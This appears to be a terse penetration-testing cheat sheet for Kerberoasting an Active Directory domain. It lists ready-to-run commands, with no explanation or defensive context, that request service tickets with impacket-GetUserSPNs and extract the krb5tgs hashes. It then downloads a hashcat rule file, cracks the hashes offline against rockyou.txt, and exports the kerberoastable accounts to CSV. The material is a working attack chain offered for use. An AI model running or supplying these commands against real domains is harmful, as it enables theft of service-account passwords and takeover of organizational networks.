Kerberoasting

impacket-GetUserSPNs -request -save $ADDOMAIN/$ADUSER -dc-ip $ADCONTROLLER | tee GetUserSPN-Output.txt

cat GetUserSPN-Output.txt | grep "krb5tgs" >> kerb.hash

wget https://github.com/stealthsploit/OneRuleToRuleThemStill/raw/refs/heads/main/OneRuleToRuleThemStill.rule
hashcat -m 13100 -a 0 kerb.hash rockyou.txt -r OneRuleToRuleThemStill.rule

cat GetUserSPN-Output.txt | grep 'CN=' | awk -F' ' 'NR==1{print "SPN,Username"};{print $1","$2}' >> Kerberoastable-User-Account.csv